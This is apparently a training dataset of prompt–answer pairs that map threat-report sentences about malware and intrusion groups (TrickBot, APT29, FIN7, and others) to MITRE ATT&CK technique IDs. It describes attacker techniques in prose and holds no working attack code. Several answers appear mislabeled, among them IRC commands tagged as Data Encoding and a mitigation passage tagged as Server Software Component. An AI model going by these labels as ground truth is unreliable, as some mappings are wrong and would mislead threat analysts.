text "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT has the ability to use an embedded SOCKS proxy in C2 communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has exfiltrated entire mailboxes from compromised accounts.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke is capable of executing commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has the capability to harvest credentials and passwords from the SAM database.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos's authentication and key exchange is performed using RSA-512.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu examines running system processes for tokens that have specific system privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete malware used FTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER can download or upload files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware operates on victims’ systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Golden tickets enable adversaries to generate authentication material for any account in Active Directory.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has used dir to search for ""programfiles"" and ""appdata"".### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo discovers the current domain information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has extracted credentials from the password database before encrypting the files.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead, an adversary can manipulate domain trusts to add their own signing certificate.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 has used various forms of spearphishing in attempts to get users to open links.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can enumerate active windows.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Certain methods of executing a program rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CARROTBAT has the ability to download and execute a remote file via certutil.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information obtained could be used to gain an understanding of common software/applications running on systems within the network.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The image is downloaded directly, and the shellcode is loaded and executed in memory### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to discover information about the compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It then sends the following IRC commands: NICK bxphzrjbxp USER bxphzrjbxp bxphzrjbxp bxphzrjbxp bxphzrjbxp To make sure it connected to the correct server, the Trojan checks for the message sent from the IRC server after the bot connects: Welcome to the MpkNet IRC Network The MPK bot does not join a specific IRC channel, instead sending private messages (PRIVMSG) to a user with the nick “mpk”### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team also collected a list of computers using specific software as part of its targeting efforts.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec schedules the execution one of its modules by creating a new scheduler task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has created and run a Bitcoin cryptocurrency miner.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most utilities include functionality to encrypt and/or compress data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,msiexec, odbcconf### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 collected emails from specific individuals, such as executives and IT staff, using New-MailboxExportRequest followed by Get-MailboxExportRequest.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One technique the group has used was to perform a WMI query SELECT * FROM MSAcpi_ThermalZoneTemperature to check the temperature to see if it’s running in a virtual environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinMM sets a WH_CBT Windows hook to collect information on process creation.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx has the ability to enumerate processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has obtained and used tools such as Mimikatz and PsExec.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used credential stuffing against victim's remote services to obtain valid accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has decrypted an AES encrypted binary file to trigger the download of other files.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can issue commands via HTTP POST.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are several known examples of this occurring.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleScript### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has used port 4050 for C2 communications.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's client configurations that can be used during targeting.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has injected a malicious DLL into the Windows Media Player process .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4H RAT obfuscates C2 communication using a 1-byte XOR with the key 0xBE.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Even though Delphi Cannon uses POP3S and SMTPS for its C2 communications like Cannon, it is arguably easier to defend against as it uses an actor owned domain that defenders can easily block and not a legitimate email provider such as Seznam### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UEFI BIOS ### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used developed tools in Python including Out1.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After running the malware, the batch script goes on to cleans up all signs of its existence on the system, this includes: Deletion of all initial files created during installation, as well as all associated files required on disk during initial execution### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,!DWN Downloads a file from a specified URL### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web Distributed Authoring and Versioning is also typically used by Windows systems as a backup protocol when SMB is blocked or fails.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has modified the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,2 Successful payload download Astaroth’s initial payload is a malicious .lnk file, a common delivery method used by threat actors### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used JavaScript to execute additional files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netsh.exe is a command-line scripting utility used to interact with the network configuration of a system.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has conducted broad phishing campaigns using malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred can search through folders and files on the system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has used UDP for C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including RegEnumKeyW.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has used spearphishing with links to try to get users to click, download and open malicious files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can create a Startup item for persistence if it determines it is on a Windows system.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It was pretending to be an Adobe flash player update installer on a compromised website to lure users to click for the execution### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typical web servers and applications only require GET, POST, and HEAD.Where possible, minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number.Secure both the operating system and the application.Update and patch production servers regularly.Disable potentially harmful SQL-stored procedure calls.Sanitize and validate input to ensure that it is properly typed and does not contain escaped code.Consider using type-safe stored procedures and prepared statements.Audit transaction logs regularly for suspicious activity.Perform penetration testing on web services.Ensure error messages are generic and do not expose too much information.Permissions, Privileges, and Access ControlsSystem operators should take the following steps to limit permissions, privileges, and access controls.Reduce privileges to only those needed for a user’s duties.Restrict users’ ability (permissions) to install and run unwanted software applications, and apply the principle of “Least Privilege” to all systems and services### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has been observed enumerating system drives and partitions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 configured its payload to inject into the rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may craft various search engine queries depending on what information they seek to gather.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker's DLL has also been embedded within the PowerShell script in hex format.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper used letmein to scan for saved usernames on the target system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used the Csvde tool to collect Active Directory files and data.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search in different open databases depending on what information they seek to gather.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has distributed Machete through a fake blog website.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used CVE-2014-6324 to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker variants used the Windows AUTORUN feature to spread through USB propagation.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has created scheduled tasks that run a VBScript to execute a payload on victim machines.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The time of the observed attacker activity coincides with Iran’s Daylight Time, which is +0430 UTC### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox has the ability to download next stage malware components to a compromised system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used AES-128 to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy can inject a malicious DLL into a process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin uses a command prompt to run a PowerShell script from Excel.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT3 downloader establishes SOCKS5 connections for its initial C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can collect or forward email from mail servers or clients.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used net accounts and net accounts /domain to acquire password policy information.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has signed payloads with code signing certificates from Thawte and Sectigo.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools such as PsExec and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Root certificates can also be cloned and reinstalled.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other Process Injection techniques such as Process Hollowing.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher uses token manipulation with NtFilterToken as part of UAC bypass.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has crafted phishing emails containing malicious hyperlinks.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can create a new access token that duplicates an existing token using DuplicateToken.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has used rundll32.exe to execute components of VirtualBox.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Active Setup is a Windows mechanism that is used to execute programs when a user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT3 downloader first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60.229 on TCP port 81.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to capture keystrokes on an infected host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also uses launchctl to unload all Launch Daemons when updating to a newer version of LoudMiner.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The at utility exists as an executable within Windows for scheduling tasks at a specified time and date.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader can download further malware for execution on the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Eventually it will start new processes with the stored token attached.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can map UPnP ports.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used application shim databases for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may access network configuration files to collect sensitive data about the device and the network.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NDiskMonitor obtains the victim computer name and encrypts the information to send over its C2 channel.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,mericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has named its backdoor ""WINWORD.exe"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can save collected system information to a file named ""info"" before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used net use to conduct connectivity checks to machines.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows’ Remote Desktop Protocol (RDP).### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer uses WMI to help propagate itself across a network.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape uses Tor to communicate with C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has relied upon users clicking on a malicious attachment delivered through spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has created the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU to maintain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses ActiveX objects for file execution and manipulation.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf can execute shell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot can decrypt data received from a C2 and save to a file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette has been executed through malicious links within spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CallMe exfiltrates data to its C2 server over the same protocol as C2 communications.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly executes and stores obfuscated Perl scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can identify remote hosts on connected networks.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, Rising Sun can decrypt its configuration data at runtime.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can steal passwords from the KeePass open source password manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to create files in a TEMP folder to act as a database to store information.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty packs a plugin with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system ""net"" when ""net"" is executed from the command-line.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote Service Session Hijacking differs from use of Remote Services because it hijacks an existing session rather than creating a new session using Valid Accounts.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo uses JavaScript to get the system time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Host enumeration and lateral movement After gaining an initial foothold in a compromised environment, the threat actors quickly identify and explore accessible systems### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI is an administration feature that provides a uniform environment to access Windows system components.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use self signed Java applets to execute signed applet attacks.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can use TCP for C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use search engines to collect information about victims that can be used during targeting.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used the Registry to store encrypted payloads.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can execute commands on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUPERNOVA has masqueraded as a legitimate SolarWinds DLL.### Assistant: T1036: Masquerading" "### 